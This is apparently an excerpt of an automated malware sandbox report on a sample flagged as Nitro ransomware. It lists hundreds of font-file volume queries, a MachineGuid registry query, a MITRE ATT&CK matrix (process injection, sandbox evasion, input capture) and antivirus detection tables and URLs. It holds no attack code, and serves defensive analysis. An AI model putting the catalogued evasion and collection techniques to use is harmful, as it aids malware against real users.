            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe
  Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
  Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
  Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
  Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
  Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
  Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
  Queries volume information: C:\Users\user\AppData\Local\Temp\12057ad2.exe VolumeInformation
  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
  Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
  Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\Desktop\12057ad2.exe
  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Mitre Att&ck Matrix (techniques listed per tactic; a number in parentheses is the count badge the report shows next to that technique):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Registry Run Keys / Startup Folder (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Timestomp (1); Indicator Removal from Tools
Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (111); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (22)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Input Capture (1); Archive Collected Data (11); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Generate Fraudulent Advertising Revenue
Impact: Modify System Partition; Device Lockout; Delete Device Data; Data Encrypted for Impact
Behavior graph legend (graph icons not reproduced): Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
12057ad2.exe | 92% | ReversingLabs | ByteCode-MSIL.Ransomware.Nitro
12057ad2.exe | 62% | Virustotal |
12057ad2.exe | 54% | Metadefender |
12057ad2.exe | 100% | Avira | HEUR/AGEN.1232324
12057ad2.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\12057ad2.exe | 100% | Avira | HEUR/AGEN.1232324
C:\Users\user\AppData\Local\Temp\12057ad2.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\12057ad2.exe | 92% | ReversingLabs | ByteCode-MSIL.Ransomware.Nitro
C:\Users\user\AppData\Local\Temp\12057ad2.exe | 54% | Metadefender |

Unpacked PE Files
Source | Detection | Scanner | Label
0.0.12057ad2.exe.c60000.0.unpack | 100% | Avira | HEUR/AGEN.1232324

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
https://discord.com/api/v8/entitlements/gift-codes/ | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
